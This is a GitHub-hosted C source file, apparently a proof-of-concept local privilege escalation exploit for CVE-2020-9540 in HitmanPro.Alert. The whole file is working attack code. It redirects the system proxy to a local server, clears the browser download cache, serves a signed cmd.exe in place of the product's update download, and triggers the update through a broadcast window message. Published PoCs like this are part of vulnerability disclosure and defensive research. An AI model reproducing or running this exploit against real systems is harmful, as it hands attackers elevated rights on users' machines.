-
Notifications
You must be signed in to change notification settings - Fork 20
/
CVE-2020-9540.c
175 lines (158 loc) · 4.91 KB
/
CVE-2020-9540.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
/*
HitmanPro.Alert insecure downloads LPE exploit PoC
*/
#include <Windows.h>
#include <ShlObj.h>
#include <WinInet.h>
#include <stdio.h>
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "WinInet.lib")
#define REG_INTERNET_SETTINGS "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings"
typedef struct _DATA
{
LPVOID FileBytes;
DWORD FileSize;
} DATA, *PDATA;
/*
State is equal can be TRUE to turn on the proxy, and FALSE to turn of the proxy
*/
BOOL SetSystemProxy(BOOL State, LPCSTR ServerString)
{
DWORD dwData;
dwData = State ? 1 : 0;
if (!RegSetKeyValueA(HKEY_CURRENT_USER, REG_INTERNET_SETTINGS, "ProxyEnable", REG_DWORD, &dwData, sizeof(dwData)))
{
if (!dwData)
{
RegDeleteValueA(HKEY_CURRENT_USER, REG_INTERNET_SETTINGS, "ProxyServer");
return(TRUE);
}
else
{
if (!RegSetKeyValueA(HKEY_CURRENT_USER, REG_INTERNET_SETTINGS, "ProxyServer", REG_SZ, ServerString, strlen(ServerString)))
{
return(TRUE);
}
}
}
return(FALSE);
}
BOOL ClearDownloadCache(LPCSTR CachePrefix)
{
SHFILEOPSTRUCT fileOp;
LPVOID lpPath;
ZeroMemory(&fileOp, sizeof(fileOp));
lpPath = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_PATH + strlen(CachePrefix));
if (SHGetFolderPathA(0, CSIDL_LOCAL_APPDATA, NULL, SHGFP_TYPE_DEFAULT, lpPath) == S_OK)
{
strcat_s(lpPath, MAX_PATH, CachePrefix);
fileOp.wFunc = FO_DELETE;
fileOp.pFrom = lpPath;
fileOp.pTo = lpPath;
fileOp.fFlags = FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT;
fileOp.fAnyOperationsAborted = FALSE;
if (!SHFileOperationA(&fileOp))
{
HeapFree(GetProcessHeap(), 0, lpPath);
return(TRUE);
}
else
{
HeapFree(GetProcessHeap(), 0, lpPath);
return (FALSE);
}
}
return (FALSE);
}
BOOL LoadSignedFile(PDATA SignedFileData)
{
HANDLE hFile;
hFile = CreateFileA("C:\\Windows\\System32\\cmd.exe", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, 0);
if (hFile != INVALID_HANDLE_VALUE)
{
SignedFileData->FileSize = GetFileSize(hFile, NULL);
SignedFileData->FileBytes = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SignedFileData->FileSize);
ReadFile(hFile, SignedFileData->FileBytes, SignedFileData->FileSize, NULL, NULL);
CloseHandle(hFile);
return(TRUE);
}
return(FALSE);
}
VOID FileServerLoop(PDATA SignedFileData)
{
struct sockaddr_in serverAddr;
struct sockaddr_in clientAddr;
WSADATA wsaData;
SOCKET sockServer;
SOCKET sockConnected;
LPCSTR lpszHost;
BOOL bBreak;
CHAR recvBuff[0x5000];
int sinSize;
int optVal;
WSAStartup(MAKEWORD(2, 2), &wsaData);
sockServer = socket(AF_INET, SOCK_STREAM, 0);
optVal = 1;
setsockopt(sockServer, SOL_SOCKET, SO_REUSEADDR, &optVal, sizeof(optVal));
serverAddr.sin_family = AF_INET;
serverAddr.sin_port = htons(8080);
serverAddr.sin_addr.s_addr = INADDR_ANY;
memset(&(serverAddr.sin_zero), 0, 8);
bind(sockServer, (struct sockaddr *)&serverAddr, sizeof(struct sockaddr));
bBreak = FALSE;
printf("[i] Server started on port 8080\n");
do {
listen(sockServer, 5);
fflush(stdout);
sinSize = sizeof(struct sockaddr_in);
sockConnected = accept(sockServer, (struct sockaddr *)&clientAddr, &sinSize);
memset(&recvBuff, 0x00, sizeof(recvBuff));
recv(sockConnected, recvBuff, sizeof(recvBuff), 0);
//printf("Received:%s", recvBuff); // Debug
lpszHost = strstr(&recvBuff, "Host: ");
if (!strncmp(lpszHost, "Host: get.hitmanpro.com", 23))
{
bBreak = TRUE;
send(sockConnected, SignedFileData->FileBytes, SignedFileData->FileSize, 0);
}
closesocket(sockConnected);
} while (!bBreak);
closesocket(sockServer);
WSACleanup();
ExitThread(0);
}
void main()
{
HANDLE hServer;
DATA dSignedFile;
if (SetSystemProxy(FALSE, ""))
{
if (SetSystemProxy(TRUE, "127.0.0.1:8080"))
{
InternetSetOption(NULL, INTERNET_OPTION_SETTINGS_CHANGED, NULL, 0);
InternetSetOption(NULL, INTERNET_OPTION_REFRESH, NULL, 0);
printf("[i] Set system proxy\n");
if (ClearDownloadCache("\\Microsoft\\Windows\\INetCache\\IE\\*"))
{
printf("[i] Cleaned download cache\n");
if (LoadSignedFile(&dSignedFile))
{
printf("[i] Loaded signed file\n");
hServer = CreateThread(NULL, 0, &FileServerLoop, &dSignedFile, 0, NULL);
Sleep(1500); // Ensure proxy is started
SendMessageA(HWND_BROADCAST, 0x111, 0x3FC, 0); // Update message to Hitmanpro.Alert
WaitForSingleObject(hServer, INFINITE);
printf("[i] Exploit complete\n");
HeapFree(GetProcessHeap(), 0, dSignedFile.FileBytes);
if (SetSystemProxy(FALSE, ""))
{
printf("[i] Removed system proxy\n");
}
}
}
}
}
printf("[.] Press enter to exit\n");
getchar();
return;
}